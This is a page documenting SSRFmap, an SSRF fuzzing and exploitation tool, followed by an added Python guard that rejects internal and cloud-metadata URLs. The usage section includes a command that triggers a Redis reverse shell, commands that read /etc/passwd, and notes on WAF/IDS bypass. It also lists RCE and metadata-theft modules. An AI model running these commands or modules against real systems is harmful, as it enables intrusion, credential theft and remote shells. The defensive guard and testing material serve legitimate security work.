SSRFmap – Automatic SSRF Fuzzer And Exploitation Tool

SSRF is sometimes used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery, or SSRF, is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM
Basic install from the Github repository.

git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

optional arguments:
  -h, --help     show this help message and exit
  -r REQFILE     SSRF Request file
  -p PARAM       SSRF Parameter to target
  -m MODULES     SSRF Modules to enable
  -l HANDLER     Start a handler for a reverse shell
  --lhost LHOST  LHOST reverse shell
  --lport LPORT  LPORT reverse shell
  --level [LEVEL]  Level of test to perform (1-5, default: 1)

The default way to use this script is the following.

# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l creates a listener for the reverse shell on the specified port
# --lhost and --lport work like in Metasploit; these values are used to create a reverse shell payload
# --level: a way to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...

A quick way to test the framework is with the data/example.py SSRF service.

FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules
The following modules are already implemented and can be used with the -m argument.

Name          Description
fastcgi       FastCGI RCE
redis         Redis RCE
github        Github Enterprise RCE < 2.8.7
zabbix        Zabbix RCE
mysql         MySQL Command execution
docker        Docker Infoleaks via API
smtp          SMTP send mail
portscan      Scan ports for the host
networkscan   HTTP Ping sweep over the network
readfiles     Read files such as /etc/passwd
alibaba       Read files from the provider (e.g: meta-data, user-data)
aws           Read files from the provider (e.g: meta-data, user-data)
digitalocean  Read files from the provider (e.g: meta-data, user-data)
socksproxy    SOCKS4 Proxy
smbhash       Force an SMB authentication via a UNC Path
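The --level payload variants (127.0.0.1 -> [::] -> ...) and the cloud-metadata modules above are what an application-side guard has to withstand. The following is an added example, written for this page and not part of SSRFmap or the repository's data/example.py, of such a guard: it allow-lists the scheme, resolves the host, and rejects loopback, private, link-local (169.254.169.254 metadata), unspecified ([::], 0.0.0.0) and IPv4-mapped IPv6 addresses. DEMO_DNS and demo_resolver are a constructed lookup table so the example runs without network access; dns_resolve is the real resolver a deployment would use.

```python
"""Outbound-URL guard: the defensive counterpart of an SSRF fuzzer.

Added example (not SSRFmap code). Validates a user-supplied URL before a
server-side fetch: scheme allow-list, then resolve the host and refuse any
address that is loopback, private, link-local, unspecified, multicast,
reserved, or an IPv4-mapped IPv6 form hiding one of those.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed lookup table, used only so the demonstration runs offline.
DEMO_DNS = {
    "www.example.test": ["93.184.216.34"],
    "intranet.example.test": ["10.0.0.5"],
    # One public and one loopback record: a single bad record must fail the check.
    "dual.example.test": ["93.184.216.34", "127.0.0.1"],
}


def demo_resolver(host):
    """Constructed stand-in for DNS; returns [] for unknown names."""
    return DEMO_DNS.get(host.lower(), [])


def dns_resolve(host):
    """Real resolver for hostnames. getaddrinfo normalises shorthand such as
    127.1 or 0x7f000001 the same way an HTTP client would, so the guard
    judges the address the client will actually connect to."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def is_internal(addr):
    """True if addr is anything other than a globally routable unicast address."""
    ip = ipaddress.ip_address(addr)
    # ::ffff:127.0.0.1 style literals: judge the embedded IPv4 address instead.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved
            or not ip.is_global)


def is_safe_url(url, resolver=dns_resolve):
    """Return (ok, reason). Only http(s) to a globally routable host passes."""
    try:
        parts = urlsplit(url)
        host = parts.hostname  # strips the [] around IPv6 literals and any user@ prefix
    except ValueError:
        return False, "malformed URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "no host"
    # IP literals are judged directly; only real names go to the resolver.
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        addrs = resolver(host)
    if not addrs:
        return False, f"{host} does not resolve"
    for addr in addrs:
        if is_internal(addr):
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"


if __name__ == "__main__":
    samples = [
        "http://www.example.test/",
        "http://intranet.example.test/",
        "http://dual.example.test/",
        "http://127.0.0.1:6379/",
        "http://[::]/",
        "http://[::ffff:127.0.0.1]/",
        "http://169.254.169.254/latest/meta-data/",
        "file:///etc/passwd",
    ]
    for sample in samples:
        ok, reason = is_safe_url(sample, resolver=demo_resolver)
        print(f"{'ALLOW' if ok else 'BLOCK':5}  {sample:45}  {reason}")
```

Two caveats the check does not cover on its own: the address resolved here can differ from the one the HTTP client resolves a moment later (DNS rebinding), so the client should connect to the vetted address rather than re-resolve the name; and an allowed public host can answer with a redirect to an internal one, so redirects must be disabled or each hop re-validated.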

Inspired by